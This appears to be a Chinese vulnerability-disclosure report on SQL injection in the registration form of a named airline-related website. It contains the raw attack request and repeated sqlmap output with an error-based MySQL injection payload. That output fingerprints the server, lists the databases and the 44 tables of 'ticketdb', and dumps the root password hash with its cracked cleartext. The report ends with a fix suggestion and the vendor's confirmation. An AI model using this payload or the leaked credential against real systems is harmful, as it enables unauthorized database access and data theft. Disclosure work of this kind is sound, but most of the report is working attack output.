2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-11-26: 厂商已经确认,细节仅向厂商公开 2015-12-06: 细节向核心白帽子及相关领域专家公开 2015-12-16: 细节向普通白帽子公开 2015-12-26: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
POST /register.aspx HTTP/1.1Content-Length: 600Content-Type: application/x-www-form-urlencodedReferer: http://pyh.luckyair.net:80/Cookie: ASP.NET_SessionId=riwoeb5h2jm13n4bnmy3vsvdHost: pyh.luckyair.netConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*ctl00%24content%24btnRegister=%e6%b3%a8%20%20%e5%86%8c&ctl00%24content%24account=1'%22&ctl00%24content%24email=sample%40email.tst&ctl00%24content%24mobile=987-65-4329&ctl00%24content%24passconfirm=g00dPa%24%24w0rD&ctl00%24content%24password=g00dPa%24%24w0rD&ctl00%24content%24realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm%2bHvDwLQzvSmBAKFid%2byAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q%2b8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA%3d%3d&__VIEWSTATEGENERATOR=799CC77D
root 密码解出:1234
可sql-shell
sqlmap resumed the following injection point(s) from stored session:---Parameter: ctl00$content$account (POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: ctl00$content$btnRegister=%e6%b3%a8 %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0current database: 'ticketdb'sqlmap resumed the following injection point(s) from stored session:---Parameter: ctl00$content$account (POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: ctl00$content$btnRegister=%e6%b3%a8 %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0current user: 'root@localhost'sqlmap resumed the following injection point(s) from stored session:---Parameter: ctl00$content$account (POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: ctl00$content$btnRegister=%e6%b3%a8 %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0sqlmap resumed the following injection point(s) from stored session:---Parameter: ctl00$content$account (POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: ctl00$content$btnRegister=%e6%b3%a8 %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0available databases [5]:[*] information_schema[*] mysql[*] performance_schema[*] test[*] ticketdbsqlmap resumed the following injection point(s) from stored session:---Parameter: ctl00$content$account (POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: ctl00$content$btnRegister=%e6%b3%a8 %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0select database(): 'ticketdb'sqlmap resumed the following injection point(s) from stored session:---Parameter: ctl00$content$account (POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: ctl00$content$btnRegister=%e6%b3%a8 %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0database management system users password hashes:[*] root [2]: password hash: *A4B6157319038724E3560894F7F932C8886EBFCF clear-text password: 1234 password hash: NULLsqlmap resumed the following injection point(s) from stored session:---Parameter: ctl00$content$account (POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: ctl00$content$btnRegister=%e6%b3%a8 %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0select database(): 'ticketdb'select user(): 'root@localhost'sqlmap resumed the following injection point(s) from stored session:---Parameter: ctl00$content$account (POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: ctl00$content$btnRegister=%e6%b3%a8 %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: MySQL 5.0Database: ticketdb[44 tables]+------------------------+| info_adv || npc_dict_group || npc_dict_item || npc_info_content_page || npc_info_group || npc_notice_info || npc_notice_push_record || npc_sys_action_detail || npc_sys_action_log || npc_sys_admin_info || npc_sys_authorization || npc_sys_config || npc_sys_exception_log || npc_sys_link_user_org || npc_sys_link_user_role || npc_sys_member_data || npc_sys_member_info || npc_sys_menu || npc_sys_org_group || npc_sys_org_info || npc_sys_role_info || npc_sys_user_data || npc_sys_user_info || shop_address || shop_brand || shop_cart || shop_category || shop_comment || shop_commodity || shop_commodity_detail || shop_commodity_price || shop_consultation || shop_favorite || shop_logs || shop_order || shop_order_flow || shop_order_item || shop_packages || shop_pay_item || shop_pay_list || shop_paylist || shop_sale || shop_service_order || shop_supplier_info |+------------------------+
过滤相关参数
危害等级:中
漏洞Rank:5
确认时间:2015-11-26 10:29
够专注、够用心。 已组织相关人员修复该漏洞。
暂无